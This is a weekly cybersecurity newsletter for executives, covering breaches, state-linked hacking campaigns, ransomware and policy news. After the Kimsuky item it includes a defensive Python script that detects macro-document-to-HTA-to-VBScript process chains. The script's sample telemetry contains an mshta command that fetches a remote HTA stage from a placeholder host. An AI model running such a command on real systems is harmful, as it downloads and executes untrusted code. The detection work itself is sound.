Strategic insights for leaders from tactical cyber observers.
As the world becomes increasingly dependent on the internet and cyberspace remains a contested environment, leaders must monitor geopolitical and cybersecurity risks more than ever. LookingGlass presents the Cyber Monitor – a weekly rollup of analysis and trending topics in cybersecurity for executives to keep abreast of threats, incidents, and risks to their organization and national security.
TABLE OF CONTENTS
- EDITOR’S HIGHLIGHTS
- NATION STATE ACTIVITY
- CRITICAL INFRASTRUCTURE
→ NATO officials have stated that they are attempting to assess the impact of a security breach at the French arms manufacturer MBDA Missile Systems. The leaked data includes blueprints of weapons used by Ukraine in its current war with Russia. Integrated defense company MBDA Missile Systems, headquartered in France, has acknowledged that data from its systems is a part of the cache being sold by threat actors on hacker forums after what appears to be a ransomware attack. MBDA initially denied being hacked on August 1, but had to retract its claim after hackers began selling more than 80GB of internal files, including weapons design systems, for 15 BTC. Although the company told the BBC that the data was not sensitive, the British news outlet discovered documents labeled “NATO CONFIDENTIAL,” “NATO RESTRICTED,” and “Unclassified Controlled Information” in the files for sale online. Risky Biz Dark Reading
Analyst Comment: As reported in one of the previous editions of LookingGlass Cyber Monitor, the MBDA Missile Systems leaks were offered for sale by a Breached Forums user under the alias adrastea. As of August 24, 2022, adrastea had lowered the price for the data to 0.5 BTC for a buyer willing to purchase all of the data at once. Such a significant drop in price may suggest that other threat actors did not find the data useful, and that some of adrastea’s claims regarding the significance of the data are false. The most recent update of the thread states that samples of the data are no longer accessible because the account was banned by MEGA (a cloud storage and file hosting service commonly used by cyber criminals). According to adrastea, the files will soon be published on Telegram. LookingGlass continues to monitor the situation. As a point of reference, US CUI (Controlled Unclassified Information), the equivalent of the documents claimed to be leaked, is required to be password-protected.
→ Russia’s major streaming platform START suffered a major data leak, impacting its 44 million users. A Telegram channel known as Information Leaks first disclosed the breach, saying that a 72 GB database containing information on 43,937,127 users worldwide can now be found in open access. The streaming company said on Telegram that the leaked information in the database is not completely up to date, with the data in it dating back to 2021. Although START claimed that “the database is not of great interest to attackers,” Information Leaks said that the stolen data includes first/last names, email addresses, hashed passwords, IP addresses, countries, start/end date of subscriptions, and last login. START is a subscription-based international streaming service with subscribers in 174 countries co-owned by MegaFon, Russia’s second-largest mobile phone operator. It currently remains unclear who is responsible for the attack. cybernews
Analyst Comment: “Information Leaks” is a Telegram channel that reports recent data leaks and breaches, primarily those that affect organizations located in Russia and Belarus, occasionally covering stories regarding breaches affecting organizations in Ukraine and other countries. While many sources cite “Information Leaks” as the original source that disclosed the breach of START, LookingGlass observed it first being published on Breached Forums by someone using the alias RuPeaceDa. The choice of the alias in this case is interesting and clever, considering that an English speaker will likely see it as a message calling for peace, while a native Russian speaker can recognize an offensive way of saying that “This is the end of RU[ssia]”. For these reasons, we assess the data was likely leaked by pro-Ukrainian hacktivists.
NATION STATE ACTIVITY
→ Iranian hacker group MuddyWater is continuing to exploit the Log4j vulnerability to gain access to corporate networks in Israel amid an ongoing proxy war between the two countries, according to new research. The threat actor, which is also known as Mercury, has targeted vulnerabilities in SysAid, a popular IT management software used by many Israeli organizations, according to a report published by Microsoft on Thursday, August 25. US Cyber Command said earlier this year that the group is affiliated with the Iranian Ministry of Intelligence and Security. In December, the group targeted telecommunication and IT service providers in the Middle East and Asia. MuddyWater’s new attack, detected by Microsoft in late July, is another example of state-sponsored operations exploiting Log4Shell, a vulnerability in the Java library Log4j used to add logging capabilities to web and desktop applications. Earlier in December, Microsoft discovered that nation-state groups from China, Iran, North Korea, and Turkey were abusing Log4Shell to gain access to targeted networks. The Record
→ Montenegro’s security agency warned Friday, August 26, that hackers from Russia have launched a massive, coordinated cyberattack against the small nation’s government and its services. The Agency for National Security, or ANB, said Montenegro is “under a hybrid war.” The Adriatic Sea state, once considered a strong Russian ally, joined NATO in 2017 despite strong opposition from Moscow. It has also joined Western sanctions against Russia for its invasion of Ukraine. In addition to most European countries, Russia has added Montenegro to its list of “enemy states” for acting against the Kremlin’s interests. The Montenegrin government earlier last week reported the first of a series of cyberattacks on its servers but said it managed to prevent any damage. However, the attack seems to be ongoing. The US embassy in Montenegro warned that the attack may disrupt the public utility, transportation (including border crossings and airport), and telecommunication sectors. Local10
Analyst Comment: Cuba Ransomware has listed the Parliament of Montenegro on its data leak site. The victim posting describes the Department for Public Relations, so it is possible that this department was the only one compromised. The date of the compromise is listed as August 19, 2022.
→ In early 2022, Kaspersky observed the Kimsuky threat actor group targeting primarily Korea-related entities. The group was attacking the media and a think-tank in South Korea; Kaspersky reported technical details to its threat intelligence customers. In its new attack, the actor initiated the infection chain by sending a spear-phishing email containing a macro-embedded Word document. Various examples of different Word documents were uncovered, each showing different decoy contents related to geopolitical issues on the Korean Peninsula. The actor took advantage of the HTML Application file format to infect the victim and occasionally used a Hangeul decoy document. After the initial infection, a Visual Basic Script was delivered to the victim. In this process, the actor abused a legitimate blog service to host a malicious script in an encoded format. The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads in an encoded format. The final stage is a Windows executable-type malware that is capable of stealing information from the victim such as file lists, user keystrokes, and stored web browser login credentials. According to Kaspersky, the targets of this operation are people or entities related to politics or diplomatic activities. The Kimsuky group has been known to target these same groups in the past, along with journalists, professors, and North Korean defectors. Securelist
Analyst Comment: One of the most notable findings of this recent research is the evolution of safeguards that the threat actor implements to make sure that malicious payloads are downloaded by valid targets, not security researchers. C2 checks are performed by the attacker at each step of the infection, including checking for the existence of the unusual “chnome” string; Kaspersky researchers were unable to move past this step of the validation process. This finding demonstrates an evolution of the methods that threat actors employ to hinder analysis.
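The infection chain above (macro-embedded Office document, then an HTML Application, then a VBScript stage that fetches further payloads from a web host) leaves a distinctive parent/child process pattern on the endpoint. The following is an added detection example written for this newsletter; it is not Kaspersky's or LookingGlass's code. It assumes Sysmon-style process-creation records with pid, parent pid, image path and command line, that mshta.exe hosts the HTA stage and that wscript.exe/cscript.exe host the VBScript stage; the sample events are constructed, and the URL in them is a placeholder.

```python
"""Flag the Office -> HTA host -> script host process chain and any script
host launched with a remote URL on its command line.

Constructed example (not from the Kaspersky report). Assumptions: process
names below are the usual Windows hosts for each stage; event fields mirror
Sysmon Event ID 1 (ProcessCreate) at the level of pid/ppid/image/cmdline.
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}   # macro document stage
HTA_HOSTS = {"mshta.exe"}                                    # HTML Application stage
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}                # VBScript stage


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str


def _basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_chains(events: Iterable[ProcEvent]) -> List[Tuple[int, int, int]]:
    """Return (office_pid, hta_pid, script_pid) for every script host whose
    parent is an HTA host whose parent is an Office application."""
    events = list(events)
    by_pid = {e.pid: e for e in events}
    chains = []
    for e in events:
        if _basename(e.image) not in SCRIPT_HOSTS:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _basename(parent.image) not in HTA_HOSTS:
            continue
        grand = by_pid.get(parent.ppid)
        if grand is None or _basename(grand.image) not in OFFICE_APPS:
            continue
        chains.append((grand.pid, parent.pid, e.pid))
    return chains


def remote_script_launches(events: Iterable[ProcEvent]) -> List[int]:
    """PIDs of HTA or script hosts whose command line references an http(s)
    URL, i.e. a script pulled straight from a web host rather than from disk."""
    hits = []
    for e in events:
        if _basename(e.image) in HTA_HOSTS | SCRIPT_HOSTS:
            lowered = e.cmdline.lower()
            if "http://" in lowered or "https://" in lowered:
                hits.append(e.pid)
    return hits


# Constructed sample telemetry: one malicious chain plus a benign logon script.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              'WINWORD.EXE /n "decoy.docx"'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://blog.example.invalid/stage1.hta"),   # placeholder URL
    ProcEvent(400, 300, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\u\AppData\Local\Temp\s.vbs"),
    ProcEvent(500, 100, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\scripts\logon.vbs"),                   # benign
]

if __name__ == "__main__":
    print("chains:", find_chains(SAMPLE_EVENTS))
    print("remote script launches:", remote_script_launches(SAMPLE_EVENTS))
```

The chain check keys on lineage rather than file names because the decoy document, the HTA and the VBS can all be renamed per target; the benign logon script in the sample is ignored precisely because its parent is not an HTA host.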
→ A study published last week puts numbers and research behind the theory that the majority of hacktivist activity surrounding the Russian-Ukrainian conflict was and continues to be poorly coordinated, with no real impact on the “cyberwar” between the two countries. The study, “Getting Bored of Cyberwar: Exploring the Role of the Cybercrime Underground in the Russia-Ukraine Conflict,” examined data from two months before and four months after the war began. Researchers from three universities in the UK not only analyzed website defacements, DDoS attacks, and hundreds of announcements in Telegram channels, but also conducted interviews with those responsible for the attacks. Both legitimate IT workers and members of the cybercrime underground were drawn into the conflict as hacktivist militant forces, as was hypothesized at the outset of the study. In the weeks following Russia’s invasion of Ukraine, however, cybercriminal groups lost interest, according to the researchers’ findings. According to an analysis of the activity, the majority of defacements occurred at the beginning of the war, while DDoS attacks lasted longer, “possibly due to the widespread availability of cheap DoS-for-hire services.” The participants’ reliance on commercially available tooling suggests that they were, at best, inexperienced actors. As time passed, the researchers found no “hard” evidence that the cybercrime underground was having a significant impact on the cyberwar in comparison to the damage caused by the actual kinetic war. Risky Biz
Analyst Comment: LookingGlass findings confirm some of the results obtained by the researchers in the UK. While some groups claim to have a military-like organization and structure, in some cases it falls apart due to personal conflicts and differences in views between their members. LGC has also observed occasional false claims regarding the victim targets and the magnitude of the attacks. More sophisticated cybercriminals are also often motivated by financial gain and prefer to attract as little attention as possible, which could explain why they have largely avoided getting involved in the Russia-Ukraine conflict.
→ A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries. The fake applications are being distributed through legitimate free software sites, giving the malicious applications broad exposure to both regular visitors of the sites and search engines. According to a report by Check Point, the malware is created by a developer named ‘Nitrokod,’ whose software at first look appears to be clean of malware and provides the advertised functionality. However, Check Point says the software purposely delays the installation of the malicious components for up to a month to evade detection. Nitrokod’s offerings rank high in Google Search results, so the website acts as an excellent trap for users seeking a specific utility. Additionally, as Check Point discovered, Nitrokod’s Google Translate applet was also uploaded to Softpedia, where it reached over 112k downloads. Bleeping Computer
→ On August 28 and 29, Italy’s energy agency Gestore dei Servizi Energetici SpA was the target of a malware attack. According to a statement, GSE’s IT systems and websites were shut down to protect the data. The agency’s role as a last-resort gas buyer for Italy’s power grid has not been jeopardized. The extent of the attack and the type of data compromised are still being assessed by Italian police and cybersecurity authorities, according to a GSE spokesperson. Among other functions, GSE is one of the government agencies in charge of the running of Italy’s electricity market. Bloomberg
Analyst Comment: While this is an ongoing investigation and many details remain unknown, Italian media specify that it was a ransomware attack. The Italian daily newspaper Repubblica reported a claim made by an intelligence source it interviewed, stating “There are strong elements to say that the attack came from the East, probably from Russia”.
→ Ransomware attacks, nation-state infiltrations, and third-party access ranked first on the list of potential cybersecurity threats to the financial sector in the US, according to the Federal Reserve. The Federal Reserve Board published its annual “Cybersecurity and Financial System Resilience” report earlier this month, citing ransomware as one of the most advanced threats facing the financial sector, especially as threat actors increasingly automate it as a service. “Like traditional ransomware, ransomware as a service (RaaS) is an increasing concern with added sophistication, speed of proliferation, and difficulty of attribution,” according to the report. “RaaS allows threat actors to create ‘franchised’ threat offerings. Sophisticated threat actors license the use of their software to other malicious actors, often for a percentage of the ransom.” DDoS attacks were also pointed to as a growing issue for the financial sector, according to the report. Ongoing violence in Ukraine will also impact the US financial sector’s cyber stability, as will the potential access of the many third parties that banks and other financial institutions use. “Geopolitical events, such as the Russian invasion of Ukraine, have led to the potential for [an] increase in cyberattacks that may impact critical infrastructure including the financial services sector,” according to the report. SC Magazine
Analyst Comment: According to LookingGlass research of statements made by cybercriminals in underground environments, while many cybercriminals choose to avoid targeting healthcare, energy sector, educational institutions, and the government, financial organizations are always seen as valid targets by cybercriminals. According to the most recent Sophos State of Ransomware whitepaper, financial services organizations have one of the lowest ransom payout rates (32%), meaning that targeting financial services may not be the most lucrative for ransomware threat actors. However, there are other ways both financially motivated and nation state threat actors can benefit from targeting the financial services sector, including theft of PII and customer account information, opening additional avenues for fraud, as well as political and ideological leverage.
→ Cyberattacks are increasingly being focused on smaller healthcare companies and specialty clinics without the resources to protect themselves, instead of larger health systems, according to a new report from Critical Insight. Approximately 20M people were affected in the first half of this year, marking the third consecutive quarter of breach decline and a 28% decrease from the same period last year. Healthcare providers, business associates (companies that handle data on behalf of providers and insurers), and health plans account for 73%, 15%, and 12%, respectively, of total breaches. Breaches involving healthcare providers decreased from 269 in the first half of 2021 to 238 in the first half of 2022. That shift, from “large hospital systems and payers to smaller entities that truly have a deficit when it comes to cyber defenses, shows a massive change in victims and approach,” John Delano, healthcare cybersecurity strategist at Critical Insight and Vice President at Christus Health, said in a statement on the report. Healthcare Dive
→ US military and intelligence entities are renewing their efforts to protect electoral procedures from hacking and disinformation before and during the November midterm elections. The news comes from US Cyber Command and the NSA, who published a joint blog post detailing their security capabilities on Thursday, August 25. The Election Security Group (ESG) operates under the guidance of USCYBERCOM’s co-lead and deputy commander of the Cyber National Mission Force, Victor Macias, and Anna Horrigan, NSA’s senior executive and election security co-lead. ESG’s primary goals are to monitor and research foreign adversaries who may interfere with or influence elections. The group also bolsters domestic defense by sharing information with allied partners and imposing sanctions on foreign actors who seek to undermine democratic processes. The partnership comes weeks after the US Cybersecurity and Infrastructure Security Agency (CISA) compiled and released a list of free cybersecurity tools for the election community. Info Security
→ DHS is making progress on a list of ten recommendations from the agency’s inspector general to make improvements to internal cybersecurity policies and employee training practices, according to an August 22 IG report that covers audit results reaching as far back as fiscal year 2019. The report delivered to DHS Chief Information Officer Eric Hysen features the ten recommendations designed to improve the Department’s mitigation of risk related to malware, ransomware, and phishing attacks. DHS concurred with all ten recommendations, and the IG report says that the agency’s corrective actions have left half of the recommendations “closed and resolved,” and the other half “open and resolved” pending full implementation of the recommendations. At the heart of the IG recommendations are two issues. The first is DHS’ need to revise security policies and procedures to reflect the latest standards by the National Institute of Standards and Technology (NIST), and the second is to get up to speed on educating DHS personnel across various components on the risks from malware, ransomware, and phishing attacks. The IG report also provides some revealing statistics on how often DHS is targeted by cyber attacks. It said the DHS CIO office reported more than 3k “cyber incidents” reported by agency components between September 2017 and March 2021. Those incidents included 115 malware, ransomware, and phishing incidents, according to the IG. Meritalk
→ Vulnerabilities in decentralized finance (DeFi) platforms are being exploited by cybercriminals to steal cryptocurrency, the FBI warned Monday, August 29. DeFi platforms generally rely on smart contracts, which are automated agreements that lack an intermediary, like a broker. However, that has left many platforms, and the assets investors entrust to them, at risk. “Cyber criminals seek to take advantage of investors’ increased interest in cryptocurrencies, as well as the complexity of cross-chain functionality and open-source nature of DeFi platforms,” the agency warned in a public service announcement. In March, Ronin Network announced attackers stole cryptocurrency worth hundreds of millions of dollars in a DeFi hack later attributed to North Korean hackers. Other DeFi platforms, including Deus Finance, Rari Capital, Saddle Finance, and Inverse Finance, have also suffered thefts. The FBI said it has observed attackers use several different tactics, including exploiting vulnerabilities related to signature verification and flash loans — smart contracts that enable conditional instant lending. The agency included advice for investors. The Record
Analyst Comment: Cybercriminals are always drawn to new lucrative types of activity. With DeFi platforms becoming more commonly used by the general population, threat actors will have more opportunities to target them. While removing the middleman is often seen as an advantage of DeFi platforms, it also means that there is a lack of regulation and insurance offered by traditional financial services, making it important to research DeFi platforms and their potential vulnerabilities prior to utilizing them.
→ Chinese hackers likely targeted energy companies operating in the South China Sea and the Australian government, the latest accusation of coordinated cyberespionage by China to advance its geopolitical goals, according to US cybersecurity firm Proofpoint. Researchers discovered a year-long phishing campaign aimed at projects such as the Kasawari gas field and a wind farm in the Taiwan Strait. Proofpoint stated that it had “moderate confidence” that the hacking was carried out by a group known as TA423, which is based in China and is motivated by espionage. The report stated that emails used in the phishing campaign impersonated Australian media organizations, including The Australian and Herald Sun, to deliver ScanBox malware. PwC Threat Intelligence, which assisted Proofpoint in its research, “assesses it is highly likely that ScanBox is shared privately amongst multiple China-based threat actors.” A ScanBox campaign running from April to June targeted agencies of the Australian government at both the local and federal level, according to the report. An earlier phishing effort centered on a European maker of heavy equipment for a wind farm in the Taiwan Strait, the report added. According to Proofpoint’s VP of threat research and detection, TA423’s “focus on naval issues is likely to remain a constant priority in places like Malaysia, Singapore, Taiwan and Australia.” Bloomberg
→ A massive Chinese database storing millions of faces and vehicle license plates was left exposed on the internet for months before it disappeared in August. At its peak the database held over 800M records, representing one of the biggest known data security lapses of the year by scale, second to a massive data leak of 1B records from a Shanghai police database in June. In both cases, the data was likely exposed inadvertently and as a result of human error. The exposed data belongs to a tech company called Xinai Electronics based in Hangzhou on China’s east coast. The company builds systems for controlling access for people and vehicles to workplaces, schools, construction sites, and parking garages across China. Security researcher Anurag Sen found the company’s exposed database on an Alibaba-hosted server in China. The database included links to high-resolution photos of faces, including construction workers entering building sites and office visitors checking in, and other personal information, such as the person’s name, age, and sex, along with resident ID numbers, which are China’s answer to national identity cards. The database also had records of vehicle license plates collected by Xinai cameras in parking garages, driveways, and other office entry points. An undated ransom note was left behind by a data extortionist, who claimed to have stolen the contents of the database and said they would restore the data in exchange for a few hundred dollars’ worth of cryptocurrency. It’s not known if the extortionist stole or deleted any data, but the blockchain address left in the ransom note shows it hasn’t yet received any funds. TechCrunch
→ 10 of the top 15 mobile carriers collect geolocation data and do not allow customers to opt out, according to the Federal Communications Commission. The carriers’ responses to the FCC’s data collection and retention questions come in response to the agency’s July request for information on geolocation practices, in light of concerns about how law enforcement could use phone data to arrest abortion-seekers in states where the procedure is now illegal or will soon be illegal. The FCC received responses from AT&T, Best Buy Health, Charter, Comcast, Consumer Cellular, C-Spire, DISH Network, Google Fi, H2O Wireless, Lycamobile, Mint Mobile, Red Pocket, T-Mobile, US Cellular, and Verizon. In their responses, the firms generally cited the need to comply with law enforcement requests as well as FCC rules as the reason for their inability to allow consumers to opt out of collection and retention. The responses also provided insight into the responding companies’ data retention practices, which ranged from two months to five years for cellular tower data. Only seven of the companies explicitly mentioned using encryption to protect that data. However, the agency is not relying on the carriers’ responses. The Enforcement Bureau will conduct follow-up investigations to ensure carriers follow FCC rules requiring them to disclose how they use and share geolocation data. Carriers have previously misled customers about how they use geolocation data. The FCC proposed fines of more than $200M against several major carriers in 2020 for selling customer location data to bail bond companies and other third parties. CyberScoop
→ US regulators have chosen e-commerce giant Alibaba and other US-listed Chinese firms for audit inspections beginning next month, according to sources familiar with the matter. The move follows a landmark audit agreement reached between Beijing and Washington on August 26, which allows US regulators to vet accounting firms in mainland China and Hong Kong, potentially putting an end to a long-running dispute that threatened to delist more than 200 Chinese companies from US stock exchanges. Alibaba has been informed that it is among the first batch of Chinese companies whose audits will be inspected in Hong Kong by the United States’ audit regulatory agency, the Public Company Accounting Oversight Board (PCAOB). The audit work inspection was also communicated to PwC, the accounting firm of Alibaba. Reuters